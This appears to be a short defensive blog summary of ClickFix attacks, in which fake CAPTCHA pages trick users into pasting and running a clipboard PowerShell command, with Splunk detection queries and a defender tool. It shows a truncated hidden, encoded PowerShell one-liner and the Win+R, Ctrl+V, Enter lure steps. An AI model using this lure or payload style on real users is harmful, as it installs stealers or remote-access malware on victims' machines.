5 min read

Unveiling Fake CAPTCHA ClickFix Attacks

Analysis of the ClickFix social engineering technique where fake CAPTCHAs trick users into executing malicious PowerShell commands via clipboard hijacking.

clickfix social-engineering phishing powershell detection splunk

Originally published on the Splunk Security Blog
Read the full article: Unveiling Fake CAPTCHA ClickFix Attacks

The Deceptively Simple Attack

ClickFix is brilliantly evil. It combines social engineering with clipboard manipulation to trick users into executing malicious commands themselves.

How It Works

  1. User visits malicious site - Often via malvertising or phishing
  2. Fake CAPTCHA appears - “Verify you’re human”
  3. Instructions displayed - “Press Win+R, then Ctrl+V, then Enter”
  4. Malicious payload executes - User unknowingly runs attacker’s code

The genius? The user voluntarily runs the command. No exploit needed.

What’s on the Clipboard?

Typically a PowerShell one-liner:

powershell -w hidden -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8A...

This downloads and executes the real payload—info stealers, RATs, or ransomware loaders.

Detection Strategies

Clipboard-to-PowerShell Pattern

index=sysmon EventCode=1 
  Image="*\\powershell.exe" 
  ParentImage="*\\explorer.exe"
  CommandLine="*-e*" OR CommandLine="*-enc*"
| table _time, Computer, User, CommandLine

Run Dialog Spawning PowerShell

| tstats count FROM datamodel=Endpoint.Processes 
  WHERE Processes.parent_process_name="explorer.exe" 
  AND Processes.process_name="powershell.exe"

ClickGrab Tool

I built ClickGrab to help defenders test and detect these attacks safely.

Read the full breakdown: Unveiling Fake CAPTCHA ClickFix Attacks

Related Modules

Active

ClickGrab

Finding ClickFix and FakeCAPTCHA like it's 1999. Detection and hunting tools for clipboard hijacking attacks.

clickfix fakecaptcha detection hunting +1
View Module → GitHub